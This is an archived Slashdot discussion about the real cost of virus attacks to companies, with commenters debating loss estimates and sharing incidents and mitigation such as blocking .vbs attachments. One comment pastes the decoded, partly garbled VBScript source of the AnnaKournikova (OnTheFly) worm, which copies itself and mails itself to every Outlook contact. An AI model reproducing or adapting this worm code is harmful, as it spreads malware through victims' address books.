Slashdot Mirror
How Much Do Computer Virus Attacks Really Cost?
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected, which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.
</rant>
--
A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.
-B
Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
--
"It's tough to be bilingual when you get hit in the head."
Viruses are probably even MORE costly. Consider:
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
Mmmm.. Donuts
I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string
e r(0)& "\AnnaKournikova.jpg.vbs"
, True)
;o)"
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
It can cost a lot when a business gets hit hard by a virus..but it shouldn't.
.vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.
.vbs files TODAY, you need to be asking why not.
Take today for example..that big new scary
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking
Windows ME sells for 169.99 at Amazon.com
Je t'aime Stéphanie
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh!